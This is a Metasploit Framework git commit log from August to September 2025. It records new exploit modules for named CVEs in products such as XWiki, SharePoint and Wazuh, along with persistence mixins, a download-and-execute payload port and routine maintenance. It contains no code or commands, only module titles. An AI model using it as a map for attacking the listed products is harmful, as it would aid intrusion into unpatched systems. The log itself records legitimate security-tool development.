h00die d9f96571e4 use new ATTCK ref 2025-09-01 18:09:25 -04:00
h00die 4591de4cae last changes for persistence bash module after peer review 2025-09-01 17:49:49 -04:00
Martin Sutovsky d056164d89 Removes redundant definitions 2025-09-01 15:53:14 +02:00
Martin Sutovsky fa64376c5c Adds comments for login function 2025-09-01 15:50:21 +02:00
jenkins-metasploit e0fec0e61b automatic module_metadata_base.json update 2025-09-01 11:46:04 +00:00
msutovsky-r7 9283562ee5 Land #20493, adds XWiki unauthenticated exploit module (CVE-2025-24893)
Add XWiki Unauthenticated RCE (CVE-2025-24893)
2025-09-01 13:37:31 +02:00
h00die fa9d58bb73 update bash_profile to persistence mixin 2025-08-30 15:17:50 -04:00
jenkins-metasploit 0e64aef9f7 automatic module_metadata_base.json update 2025-08-29 18:21:05 +00:00
msutovsky-r7 5d59fbd333 Land #19903, adds module for periodic script persistence
Add OSX Periodic Script Peristence
2025-08-29 20:12:12 +02:00
Martin Sutovsky 2681e7cfed Update docs 2025-08-29 17:53:07 +02:00
Martin Sutovsky 57f14339d9 Adds x64 to BSD target 2025-08-29 14:47:11 +02:00
Vognik 071a4a34fc fix tests 2025-08-29 08:41:43 +04:00
Maksim Rogov 9b1d07dea8 removed unnecessary fail_with from check function
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-29 06:55:59 +03:00
Spencer McIntyre 9979af9fd7 Update the specs 2025-08-28 17:59:17 -04:00
Spencer McIntyre 75c1415de4 Add the new exe templates 2025-08-28 17:41:48 -04:00
Spencer McIntyre cf8aa2fc48 Fix the build script 2025-08-28 17:41:28 -04:00
Spencer McIntyre 3af8bd97ad Consistently use the same technique for exe-service 2025-08-28 17:39:57 -04:00
Spencer McIntyre 0e95f25d4b Add the exe_service template to the build script 2025-08-28 17:28:55 -04:00
Spencer McIntyre 0192f314ce Begin normalizing PE templates 2025-08-28 17:28:37 -04:00
h00die 2b249d5626 update linux example persistence 2025-08-28 17:00:05 -04:00
cgranleese-r7 5a3195d9f6 Fixes database name stripping 2025-08-28 15:32:11 +01:00
msutovsky-r7 c163cb3141 Land #20490, adds the HTTP::Auth option to HTTP modules
This adds the `HTTP::Auth` Option to HTTP Modules
2025-08-28 16:13:38 +02:00
Spencer McIntyre 196e19808d Add some error handling for kerberos options 2025-08-28 10:00:19 -04:00
Martin Sutovsky ae64436441 Fixes payload delivery, updates targets 2025-08-28 15:47:24 +02:00
dwelch-r7 3d809fa11b Merge pull request #20499 from dwelch-r7/fix-msfconsole-crash-in-pro-install
Add the monkey patch for the TagBuilder that pro needs
2025-08-28 13:05:52 +01:00
Dean Welch 672e9fb32e Add the monkey patch for the TagBuilder that pro needs 2025-08-28 12:42:42 +01:00
Metasploit 2896b232d1 Bump version of framework to 6.4.86 2025-08-28 06:09:25 -05:00
jenkins-metasploit 66c16b0887 automatic module_metadata_base.json update 2025-08-28 07:59:52 +00:00
msutovsky-r7 c5e5cb84f1 Land #20266, adds UDP keyboard exploit module for Remote for Mac 2025.6
Adds UDP Keyboard RCE for Remote for Mac 2025.6
2025-08-28 09:47:16 +02:00
Martin Sutovsky b177507041 Adds docs 2025-08-28 09:27:32 +02:00
Martin Sutovsky f9b8a9b95e Adds more robust check method 2025-08-28 09:11:01 +02:00
Martin Sutovsky 6c65db52c5 Code rebase, fixing according to the comments 2025-08-28 09:00:12 +02:00
Chokri Hammedi a251694e2f Update modules/exploits/osx/misc/remote_for_mac_udp_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-28 08:57:56 +02:00
Chokri Hammedi eda79be4bd Update modules/exploits/osx/misc/remote_for_mac_udp_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-28 08:57:56 +02:00
Chokri Hammedi 2d1f700935 Update modules/exploits/osx/misc/remote_for_mac_udp_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-28 08:57:55 +02:00
root 8a6d12a2f4 Add exploit for Remote for Mac 2025.6 unauthenticated UDP RCE 2025-08-28 08:57:55 +02:00
root 374407fc79 Add exploit for Remote for Mac 2025.6 unauthenticated UDP RCE 2025-08-28 08:57:54 +02:00
FutileSkills 437dbd962f Merge branch 'rapid7:master' into escpos-injector-module 2025-08-27 18:03:23 -05:00
jenkins-metasploit 7549339e01 automatic module_metadata_base.json update 2025-08-27 20:55:20 +00:00
Brendan f1dffd3ad6 Merge pull request #20480 from msutovsky-r7/exploit/pretalx/file-rw
Adds modules for Pretalx File Read/Limited File Write (CVE-2023-28459, CVE-2023-28458)
2025-08-27 15:46:39 -05:00
Martin Sutovsky f43b141886 Fine-tunning docs 2025-08-27 21:18:03 +02:00
futileskills 3d942168fe added vulnerable application description 2025-08-27 12:36:25 -05:00
Martin Sutovsky 61a0d68d97 Fine-tuning docs 2025-08-27 19:22:46 +02:00
Martin Sutovsky 23f486dc53 Updates docs 2025-08-27 19:16:33 +02:00
Martin Sutovsky 7196786258 Clarifies docs 2025-08-27 18:12:54 +02:00
bwatters-r7 090743abbd Update error message when there may be a timeout 2025-08-27 11:04:43 -05:00
Martin Sutovsky eef1d34506 Adds more comprehensive check, updates build instructions 2025-08-27 17:58:11 +02:00
jenkins-metasploit df86d1bd79 automatic module_metadata_base.json update 2025-08-26 20:23:12 +00:00
Spencer McIntyre c56bfcaa5b Merge pull request #20488 from mwalas-r7/fix/ssl-version-scanner
Fixed listing weak ciphers in ssl_version scan
2025-08-26 16:14:23 -04:00
Martin Sutovsky a8e97e034c Adds docs 2025-08-26 13:06:57 +02:00
Martin Sutovsky 2533ddf441 Rubocoping 2025-08-26 12:42:28 +02:00
jenkins-metasploit 2e1e2efd5c automatic module_metadata_base.json update 2025-08-25 23:28:32 +00:00
Spencer McIntyre 51a2c96e7b Merge pull request #20489 from 2tunnels/patch-1
Fix legacy method override in torchserver_cve_2023_43654
2025-08-25 19:20:09 -04:00
Marcin Walas 6c77f7479d Fixed showing weak ciphers in ssl_version scan 2025-08-25 21:41:29 +02:00
Martin Sutovsky b43b4c9f37 Updates library, addressing comments 2025-08-25 17:49:34 +02:00
Maksim Rogov bdad398541 Update Payload Generation 2025-08-25 15:49:30 +03:00
Maksim Rogov 16b3a352e8 Apply suggestion from @msutovsky-r7
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-25 10:49:49 +03:00
Maksim Rogov 51ca11a9d4 Apply suggestion from @msutovsky-r7
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-24 18:14:28 +03:00
Vognik 92ddf5646a Code Review Edits from @msutovsky-r7 2025-08-24 19:13:16 +04:00
h00die 96cc6b479c add example linux persistence module 2025-08-24 08:09:05 -04:00
Vognik 7289c25faa Fix Tests 2025-08-24 12:12:22 +04:00
Vognik 7317922be8 Added Documentation 2025-08-24 07:46:59 +04:00
Vognik 2b01ba6200 Add XWiki Unauthenticated RCE (CVE-2025-24893) 2025-08-23 18:56:24 +04:00
futileskills 58ac914821 Added missing line from end of file/ msftidy_docs formating 2025-08-23 07:08:26 -05:00
futileskills 1621d4f756 Added option for feed lines and cut paper for better handling 2025-08-23 06:53:18 -05:00
Spencer McIntyre c1074c138e Move the options into the mixin 2025-08-22 16:05:12 -04:00
Spencer McIntyre 7fdb1e03fa Tie in Kerberos authentication for HTTP modules 2025-08-22 15:58:18 -04:00
FutileSkills 4fd97d5d0c syntax fix 2025-08-22 10:53:21 -05:00
FutileSkills 7cdcace837 remade Doc file. 2025-08-22 09:07:25 -05:00
Vlad Dmitrievich baa5469a21 Fix legacy method override in torchserver_cve_2023_43654
I think `Msf::Exploit::Remote::Java::HTTP::ClassLoader` module had `on_request_uri` method, that was later renamed to `java_class_loader_on_request_uri`.
2025-08-22 17:01:41 +03:00
Martin Sutovsky d49870211b Adding exceptions to exploit module, bug fix for aux module, adds documentation for exploit module 2025-08-22 15:26:46 +02:00
FutileSkills 9a5670b8f1 Deleted some unnecessary lines 2025-08-22 08:20:52 -05:00
FutileSkills f06cff951a QOL tweaks to escpos_tcp_command_injector.rb 2025-08-22 07:59:02 -05:00
Martin Sutovsky 4e113b1768 Addresses comments, adds exception for Pretalx, modifies aux module 2025-08-22 13:59:50 +02:00
Martin Sutovsky 2e9b5453ec Adds description 2025-08-21 15:29:08 +02:00
Martin Sutovsky fb062075e3 Adds target, adds side effects 2025-08-21 15:21:16 +02:00
Martin Sutovsky 408f7575e4 Fixing write primitive for exploit module, library update 2025-08-21 15:17:32 +02:00
Metasploit f6b9101249 Bump version of framework to 6.4.85 2025-08-21 06:36:19 -05:00
dledda-r7 53ce08ef6e feat: add stdapi_webcam extension 2025-08-21 07:13:36 -04:00
dledda-r7 0206663565 feat: add stdapi_ui extension 2025-08-21 07:13:36 -04:00
dledda-r7 02995f2f7d feat: add stdapi_railgun extension 2025-08-21 07:13:35 -04:00
dledda-r7 809599a7d6 feat: add stdapi_audio extension 2025-08-21 07:13:35 -04:00
dledda-r7 94cc3d0a29 feat: add stdapi_sys extension 2025-08-21 07:13:34 -04:00
dledda-r7 44efeffef1 fix: removing duplicate dispatchers stdapi_fs and stdapi_net 2025-08-21 07:13:34 -04:00
dledda-r7 2af25bb294 fix: disable already loaded commands to allow multiple stdapi loading 2025-08-21 07:13:34 -04:00
dledda-r7 a265deb37e fix: stdapi_net correct wrapped object alias 2025-08-21 07:13:33 -04:00
dledda-r7 d4c44f9dbf feat: add stdapi_net extension 2025-08-21 07:13:33 -04:00
dledda-r7 4fe4f8fc14 feat: add stdapi_fs extension 2025-08-21 07:13:32 -04:00
adfoster-r7 4b2ae82f87 Merge pull request #20485 from adfoster-r7/fix-ldap-schannel-supercall
Fix ldap schannel superclass method call
2025-08-21 11:52:53 +01:00
adfoster-r7 f3dd030574 Fix ldap schannel supercall 2025-08-21 11:28:26 +01:00
Metasploit 99dd2a0613 Bump version of framework to 6.4.84 2025-08-21 05:13:14 -05:00
adfoster-r7 30bda5c6a5 Merge pull request #20484 from cdelafuente-r7/add_parallel_gem
Add parallel gem to gemspec
2025-08-21 10:54:31 +01:00
Christophe De La Fuente 39e008e650 Add parallel gem to gemspec 2025-08-21 11:50:21 +02:00
dledda-r7 5b9f1c7818 fix: update CI for meterpreter vs2022 2025-08-21 04:06:18 -04:00
Martin Sutovsky 01c09bcfed Library fixes, refactoring exploit module 2025-08-21 09:22:21 +02:00
Martin Sutovsky 72dcc5a301 Library fix 2025-08-21 07:21:56 +02:00
rodolphopivetta 16e4d48a73 Add ssl param to new HTTP scanner on http_login 2025-08-21 00:19:48 -04:00
jenkins-metasploit ab45ae60f3 automatic module_metadata_base.json update 2025-08-20 18:26:50 +00:00
Spencer McIntyre 5735a82df7 Merge pull request #20460 from msutovsky-r7/exploit/ndsudo-priv-esc
Adds an exploit for ndsudo privilege escalation (CVE-2024-32019)
2025-08-20 14:13:24 -04:00
Spencer McIntyre 8602f8beaf Merge pull request #20470 from bwatters-r7/docs/readd-esc8
re-add ESC8 creation guide
2025-08-20 10:57:18 -04:00
Martin Sutovsky e23feb0faf Adds check for ndsudo binary 2025-08-20 12:49:38 +02:00
Metasploit f18b0ccf7d Bump version of framework to 6.4.83 2025-08-20 05:44:43 -05:00
jenkins-metasploit 5ad5384b7f automatic module_metadata_base.json update 2025-08-20 10:33:47 +00:00
dwelch-r7 d09d5212ec Merge pull request #20457 from adfoster-r7/add-database-ref-opts-for-kerberos-and-pkcs12
Add database ref opts for kerberos and pkcs12
2025-08-20 11:25:20 +01:00
Martin Sutovsky aae5356190 Updates the docs 2025-08-20 12:10:11 +02:00
Martin Sutovsky da5b20faa4 Creating lib file for shared functionality, adding more reliable check method for CVE-2025-34511, docs init 2025-08-20 10:59:22 +02:00
msutovsky-r7 29a7e4b7a8 Land #20429, updates communication channels in Metasploit documentation
Update communication channels in documentation
2025-08-20 10:17:44 +02:00
Martin Sutovsky 8c28c7dbae Code changes for 34510, adds module for CVE-2025-34511 2025-08-20 09:58:26 +02:00
Corey 88d7a1ab04 fix coonflicts and rubocop 2025-08-19 12:37:53 -04:00
Corey df917720eb Remove payload file 2025-08-19 12:33:56 -04:00
Martin Sutovsky 7ab12460f1 Fixing payloads 2025-08-19 16:11:25 +02:00
Mike 705a346b43 Update escpos_tcp_command_injector.rb 2025-08-19 06:23:22 -05:00
Mike f126885f91 Create escpos_tcp_command_injector.md 2025-08-19 06:56:16 -04:00
Mike e9a7abaac7 Update escpos_tcp_command_injector.rb
Clean up ESC/POS printer command injector: remove unnecessary HEX_COMMANDS feature, add documentation, references, and comments
2025-08-19 05:49:20 -04:00
Martin Sutovsky 96791403db Adds malicious zip upload 2025-08-19 09:56:23 +02:00
Mike 4e64a0a8e5 Create escpos_tcp_command_injector.rb 2025-08-18 18:31:16 -04:00
adfoster-r7 0557d63127 Add database ref opts for kerberos and pkcs12 2025-08-18 15:56:47 +01:00
jenkins-metasploit 7f833ceba5 automatic module_metadata_base.json update 2025-08-18 10:20:18 +00:00
Diego Ledda be3d77715e Merge pull request #20382 from Chocapikk/depicter-fix
Fix `auxiliary/gather/wp_depicter_sqli_cve_2025_2011`
2025-08-18 12:08:45 +02:00
Vognik b13f59128c Added Setup Guide for Windows 2025-08-18 08:20:32 +04:00
jenkins-metasploit bcc59f1ec7 automatic module_metadata_base.json update 2025-08-16 00:04:52 +00:00
jheysel-r7 0830de8404 Merge pull request #20471 from zeroSteiner/feat/mod/ldap/esc-finder-updates
Update the ldap_esc_vulnerable_cert_finder to check enrollment permissions
2025-08-15 16:52:29 -07:00
Jacob Pham c8f44cfbce Update docs/metasploit-framework.wiki/Contact.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-15 16:53:39 -04:00
Spencer McIntyre 170fbcb2bd Add two more report filters 2025-08-15 15:34:13 -04:00
Spencer McIntyre 1c41c734f0 Fix a missing ESC16 check 2025-08-15 15:11:52 -04:00
Spencer McIntyre 25c72d4858 Handle some edge cases in report filtering 2025-08-15 14:49:48 -04:00
Spencer McIntyre f3719b884a Document the new report filtering option 2025-08-15 11:57:30 -04:00
Spencer McIntyre c8f72a83c0 Refactor to remove redundant code 2025-08-15 11:57:30 -04:00
Spencer McIntyre 2338ad7c84 Implement the desired filtering 2025-08-15 11:57:30 -04:00
Spencer McIntyre fa33c84612 Evaluate permissions for templates and CAs 2025-08-15 11:57:30 -04:00
Spencer McIntyre 13b3af325f Apply the ACEs for Authenticated Users 2025-08-15 11:57:30 -04:00
Martin Sutovsky 52efe8d6de Module init 2025-08-15 14:37:09 +02:00
cgranleese-r7 c843e36402 Merge pull request #20469 from adfoster-r7/improve-kerberos-file-load-error-messages
Improve Kerberos file load error messages
2025-08-15 12:51:52 +01:00
adfoster-r7 bebb43f8f6 Improve kerberos file load error messages 2025-08-15 12:38:45 +01:00
Diego Ledda 487c204b52 Merge pull request #20381 from h00die/persistence_phase_1
Persistence libraries/Mixins
2025-08-15 12:40:55 +02:00
Martin Sutovsky 38f81e073f Fixing documentation, adds more reliable cmd_exec 2025-08-15 07:26:56 +02:00
bwatters-r7 97958cdf33 re-add ESC8 creation guide 2025-08-14 16:42:51 -05:00
Metasploit 996b1d0632 Bump version of framework to 6.4.82 2025-08-14 16:20:34 -05:00
Metasploit 6ef226f43e Bump version of framework to 6.4.81 2025-08-14 13:39:23 -05:00
Chocapikk f4e71c1e93 Replace Rank 2025-08-14 16:37:13 +02:00
Chocapikk 3022513652 Add CRASH_SERVICE_DOWN and "`" badchar 2025-08-14 16:16:21 +02:00
Valentin Lobstein 46bbec2470 Update modules/exploits/linux/http/aitemi_m300_time_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2025-08-14 16:11:27 +02:00
Valentin Lobstein bd9c2bf231 Update modules/exploits/linux/http/aitemi_m300_time_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-14 16:01:59 +02:00
jenkins-metasploit b59fd1c61a automatic module_metadata_base.json update 2025-08-13 10:07:02 +00:00
Diego Ledda eb003f704d Merge pull request #20386 from xHector1337/payload/windows/x64/download_exec
Port payload/windows/download_exec to x64
2025-08-13 11:58:22 +02:00
jenkins-metasploit 7ca82b47fb automatic module_metadata_base.json update 2025-08-12 19:37:04 +00:00
jheysel-r7 8251d89e92 Merge pull request #20400 from msutovsky-r7/exploit/pivotx-rce
Adds module for PivotX RCE (CVE-2025-52367)
2025-08-12 12:28:28 -07:00
Jack Heysel 0273f1474f Added incorrect creds check 2025-08-12 10:42:46 -07:00
jenkins-metasploit 3e882a3767 automatic module_metadata_base.json update 2025-08-12 16:30:43 +00:00
jheysel-r7 e59a24823b Merge pull request #20387 from h00die-gr3y/wazuh-auth-rce
Wazuh Server authenticated RCE [CVE-2025-24016]
2025-08-12 09:22:22 -07:00
jheysel-r7 4200f51fdf Merge pull request #20445 from zeroSteiner/feat/lib/ldap-adds/2
Don't look up the local system SID
2025-08-12 07:59:10 -07:00
jenkins-metasploit e1407833c2 automatic module_metadata_base.json update 2025-08-12 10:34:11 +00:00
cgranleese-r7 ec7d47c271 Merge pull request #20461 from adfoster-r7/improve-login-summary-for-ldap-scanner
Improve login summary for ldap schannel scanner
2025-08-12 11:25:50 +01:00
Diego Ledda 3122426ebe Update modules/payloads/singles/windows/x64/download_exec.rb
update cache size
2025-08-12 11:39:44 +02:00
Umut abe932cdee Update payloads_spec.rb 2025-08-12 12:34:47 +03:00
Diego Ledda b6d9172d5b chore(rubocop): remove extra white-space 2025-08-12 11:05:21 +02:00
dwelch-r7 9dee394cab Merge pull request #20463 from adfoster-r7/update-display-module-action-wording
Update display module action wording
2025-08-11 17:50:09 +01:00
dwelch-r7 003870e295 Merge pull request #20462 from adfoster-r7/fix-error-in-kerberos-authenticator
Fix logging error in kerberos authenticator
2025-08-11 17:49:31 +01:00
adfoster-r7 7c3ba83dd4 Update display module action wording 2025-08-11 17:02:35 +01:00
adfoster-r7 332a55cb4f Fix error in kerberos authenticator 2025-08-11 16:48:37 +01:00
adfoster-r7 a1630c0b81 Improve login summary for ldap schannel scanner 2025-08-11 16:47:02 +01:00
jenkins-metasploit 3817ed2e70 automatic module_metadata_base.json update 2025-08-11 15:02:00 +00:00
adfoster-r7 2734daec0f Merge pull request #20459 from adfoster-r7/consolidate-pkcs12-cert-file-reads
Consolidate pkcs12 cert file reads
2025-08-11 15:53:38 +01:00
Martin Sutovsky 94bd9eea98 Removes leftover includes 2025-08-11 16:29:16 +02:00
Martin Sutovsky fbd1c1767f Finish documentation, adds description and notes 2025-08-11 16:25:56 +02:00
adfoster-r7 ced20bf15a Consolidate pkcs12 cert file reads 2025-08-11 14:28:47 +01:00
cgranleese-r7 d25fd0825c Merge pull request #20458 from adfoster-r7/fix-rendering-issue-on-kerberos-docs
Fix rendering issue on kerberos docs
2025-08-11 13:10:59 +01:00
Umut af0fe9e5cc run rubocop -A 2025-08-11 14:22:28 +03:00
adfoster-r7 093d9f9a99 Fix rendering issue on kerberos docs 2025-08-11 12:13:53 +01:00
msutovsky-r7 b23775124b Land #20451, adds support for lwp-request GET fetch adapter
Msf::Payload::Adapter::Fetch: Add lwp-request GET fetch adapter
2025-08-11 12:54:41 +02:00
Martin Sutovsky d219efc0ac Adds documentation, adds check method 2025-08-11 12:25:33 +02:00
haicen 3dd65e3e1f Changes uploaded file to .php instead of .phar 2025-08-10 20:52:42 -04:00
RakRak 383ee010f1 Create wordpress_cp_calendar_sqli.md 2025-08-08 21:58:02 -04:00
haicen bd50485c95 Added modules to exploit Xerte Online Toolkits 2025-08-08 14:12:23 -04:00
Metasploit b8dad8d85f Bump version of framework to 6.4.80 2025-08-08 10:16:11 -05:00
Martin Sutovsky 936e68eb2e Module init 2025-08-08 07:53:56 +02:00
Chocapikk baacd6f2bf Update CVE-ID in documentation 2025-08-07 21:54:38 +02:00
Chocapikk ff4ede95cc Remove useless headers 2025-08-07 21:53:14 +02:00
Chocapikk 87eb063460 Add unauthenticated RCE on Shenzhen Aitemi M300 MT02 (CVE-2025-34152) 2025-08-07 18:34:49 +02:00
jenkins-metasploit 5e6d442860 automatic module_metadata_base.json update 2025-08-07 13:46:28 +00:00
msutovsky-r7 e8b441a5d3 Land #20012, MeterpreterOptions break-up and default extension loading removal
MeterpreterOptions break-up and default extension loading removal
2025-08-07 15:28:56 +02:00
jenkins-metasploit 6a26428029 automatic module_metadata_base.json update 2025-08-07 06:46:55 +00:00
msutovsky-r7 9caa2be9a2 Land #20399, adds module for Pandora ITSM authenticated RCE (CVE-2025-4653)
Pandora ITSM auth RCE [CVE-2025-4653]
2025-08-07 08:37:45 +02:00
Martin Sutovsky 89d70fe2f8 Clarify build instructions 2025-08-07 08:05:54 +02:00
Martin Sutovsky 8c43583e87 Removes debugging imports 2025-08-07 07:35:17 +02:00
Martin Sutovsky 02c81c57e9 Removes redundant comment 2025-08-07 07:35:17 +02:00
Martin Sutovsky febb52ea3f Fixing mkdir issue 2025-08-07 07:35:17 +02:00
Martin Sutovsky 162f73942c Specifies version in documentation 2025-08-07 07:35:16 +02:00
Martin Sutovsky e1b8453764 Removing redundant include 2025-08-07 07:35:16 +02:00
Martin Sutovsky c5c51fe577 Updates comments 2025-08-07 07:35:15 +02:00
Martin Sutovsky 547a0bb7f4 Adds sudo version check using existing functionality 2025-08-07 07:35:15 +02:00
Martin Sutovsky 0a9dda06fb Addressing comments 2025-08-07 07:35:15 +02:00
Martin Sutovsky b1acfc1b97 Addressing comments 2025-08-07 07:35:14 +02:00
Martin Sutovsky caab87096e Addressing comments, updating docs 2025-08-07 07:35:14 +02:00
Martin Sutovsky 5207f97da1 Addressing comments 2025-08-07 07:35:13 +02:00
Martin Sutovsky c6e695f5c2 Fixing notes 2025-08-07 07:35:13 +02:00
Martin Sutovsky cf0f35c8e0 Updating docs 2025-08-07 07:35:13 +02:00
Martin Sutovsky d8f0f5a0fe Adding check method, base for documentation 2025-08-07 07:35:12 +02:00
Martin Sutovsky 4c6bfdcfad Inits module 2025-08-07 07:35:12 +02:00
jenkins-metasploit 41698afa32 automatic module_metadata_base.json update 2025-08-06 19:33:05 +00:00
Brendan b6dc0860e7 Merge pull request #20409 from sfewer-r7/sharepoint-hax
Exploit module for Microsoft SharePoint ToolPane Unauthenticated RCE (CVE-2025-53770 and CVE-2025-53771)
2025-08-06 14:24:28 -05:00
sfewer-r7 0a923a611d reword the language around our usage of CVE-2025-53770 to make it clear that this module is leveraging the authentication bypass for both CVE-2025-49706 and CVE-2025-53771, and the unsafe deserialization for CVE-2025-49704. 2025-08-06 15:33:57 +01:00
adfoster-r7 00ea22600c Merge pull request #20454 from adfoster-r7/fix-show-options-crash
Fix show options crash
2025-08-06 11:50:09 +01:00
adfoster-r7 c5e342d874 Fix show options crash 2025-08-06 10:26:56 +01:00
h00die-gr3y 70f2cbe055 simplified cleaning procedure 2025-08-06 08:22:06 +00:00
Brendan 2553fed202 Merge pull request #20438 from msutovsky-r7/fix/lib/chmod_in_compile
Fixes incorrect path parameter for `chmod` in `upload_and_compile`
2025-08-05 15:12:46 -05:00
cgranleese-r7 f8acc93fdd Merge pull request #20452 from adfoster-r7/update-download-versions
Update download versions
2025-08-05 17:41:40 +01:00
adfoster-r7 9a9028e93d Update download versions 2025-08-05 17:06:21 +01:00
jenkins-metasploit 74c10a4d4b automatic module_metadata_base.json update 2025-08-05 13:48:03 +00:00
msutovsky-r7 8914520139 Land #20418, adds auto selection feature for password crackers
Adds auto selection of cracker for password crackers
2025-08-05 15:39:50 +02:00
Spencer McIntyre 6f97dbe239 Merge pull request #20372 from cgranleese-r7/add-cache-validation-logic
Adds cache invalidation logic
2025-08-05 09:36:27 -04:00
bcoles d0f0b3532f Msf::Payload::Adapter::Fetch: Add lwp-request GET fetch adapter 2025-08-05 22:54:09 +10:00
cgranleese-r7 604fc95bc6 Moves checksum to top level of file cache 2025-08-05 11:40:20 +01:00
cgranleese-r7 aab4142068 Updates to only use local store dir 2025-08-05 11:39:18 +01:00
cgranleese-r7 e9941fd91f Adds cache invalidation logic 2025-08-05 11:39:18 +01:00
jenkins-metasploit 31b9dcdeb2 automatic module_metadata_base.json update 2025-08-05 07:39:11 +00:00
msutovsky-r7 c99702c8bf Land #20446, adds module for ICTBroadcast Unauthenticated RCE (CVE-2025-2611)
Add ICTBroadcast Unauthenticated Remote Code Execution (CVE-2025-2611)
2025-08-05 09:29:36 +02:00
Spencer McIntyre 26bf49a024 Merge pull request #20431 from Wopseeion/problem-fi
Fix NoMethodError in kerberos/get_ticket by properly decoding ASN.1 OctetString in certificate SAN parsing for ticket reuqest --> "#20427"
2025-08-04 18:12:05 -04:00
Tanush-Jain becdda1591 added fixed pkinit file 2025-08-04 17:51:36 -04:00
jenkins-metasploit cf92cbb3d8 automatic module_metadata_base.json update 2025-08-04 21:36:56 +00:00
Spencer McIntyre 30c32d2643 Merge pull request #20450 from dledda-r7/chore/bump-metasploit_payloads-mettle-1_0_45
Bump metasploit_payloads-mettle gem to 1.0.45
2025-08-04 17:28:14 -04:00
jacob.w.pham.mil 0744c70c72 Implement maintainer feedback removed by accident from prior push
- Update Twitter references to X in Contact.md and README.md
- Add YouTube channel to Contact.md
- Remove IRC reference from CONTRIBUTING.md as requested
- Address all maintainer suggestions from PR review
2025-08-04 14:50:58 -04:00
jacob.w.pham.mil c2da23ae1a Update contact email in Contact.md
Replace outdated caitlin_condon@rapid7.com with smcintyre@metasploit.com
as requested by maintainers in PR feedback.
2025-08-04 14:38:59 -04:00
Hakil c4a2189614 removed blank line as requested
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 19:29:25 +02:00
Hakil f691d81899 prefer john over hashcat for more compatibility
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 19:27:54 +02:00
Chocapikk 6ff04da954 Add LPE suggestions in documentation 2025-08-04 18:33:28 +02:00
Chocapikk a81884fb9e Update metadata 2025-08-04 17:53:29 +02:00
Chocapikk 7d744c2a45 Update documentation 2025-08-04 17:51:42 +02:00
Chocapikk 2c9053c45e Refactor fingerprint detection, cookie handling and per-cookie injection
- Centralize JS fingerprint checks in `check`
- Memoize `get_valid_cookies` correctly and reuse a single `cookie_jar`
- Update `inject_command` to test payload on each cookie separately
2025-08-04 17:49:34 +02:00
Valentin Lobstein 26099da7a2 Update modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 17:03:04 +02:00
Valentin Lobstein 46b3012cda Update modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 17:02:47 +02:00
Valentin Lobstein a6d86fbe59 Update modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 17:02:35 +02:00
Valentin Lobstein c8f756dd37 Update documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 17:02:12 +02:00
dledda-r7 6d60db195b feat: bump metasploit_payloads-mettle gem to 1.0.45 2025-08-04 10:14:38 -04:00
adfoster-r7 a5b7c9859d Merge pull request #20448 from cgranleese-r7/bump-rex-powershell-and-rex-random-identifier
Bumps rex-powershell and rex-random_identifier gems
2025-08-04 14:55:16 +01:00
Diego Ledda 8985cd773d Update lib/msf/base/sessions/meterpreter_options/osx.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 14:59:20 +02:00
Diego Ledda 25e053804e Update lib/msf/base/sessions/meterpreter_options/php.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 14:59:09 +02:00
Diego Ledda ee05f88770 Update lib/msf/base/sessions/meterpreter_options/python.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 14:59:01 +02:00
Diego Ledda 56fc33f7f2 Update lib/msf/base/sessions/meterpreter_options/windows.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 14:58:50 +02:00
Diego Ledda d45193b7ac Update lib/msf/base/sessions/meterpreter_options/java.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 14:58:25 +02:00
Diego Ledda fa68bd8353 Update lib/msf/base/sessions/meterpreter_options/bsd.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 14:58:16 +02:00
Diego Ledda 2fac43c3ed Update lib/msf/base/sessions/meterpreter_options/apple_ios.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 14:57:59 +02:00
Diego Ledda 9e10d243b9 Update lib/msf/base/sessions/meterpreter_options/android.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 14:57:49 +02:00
Diego Ledda ef6e59dcc3 Update lib/msf/base/sessions/meterpreter_options/linux.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 14:57:40 +02:00
cgranleese-r7 02ff2ad000 Bumps rex-powershell and rex-random_identifier 2025-08-04 13:49:53 +01:00
dledda-r7 f18787e5c5 fix: addressing review comments 2025-08-04 08:35:23 -04:00
adfoster-r7 f7930a9977 Merge pull request #20444 from cgranleese-r7/adds-survey-banner-docs-site
Adds survey banner to the docs site
2025-08-04 12:20:01 +01:00
cgranleese-r7 5fe57c6804 Adds survey banner to the docs site 2025-08-04 12:19:22 +01:00
jenkins-metasploit 5dd2fef0a9 automatic module_metadata_base.json update 2025-08-04 09:57:20 +00:00
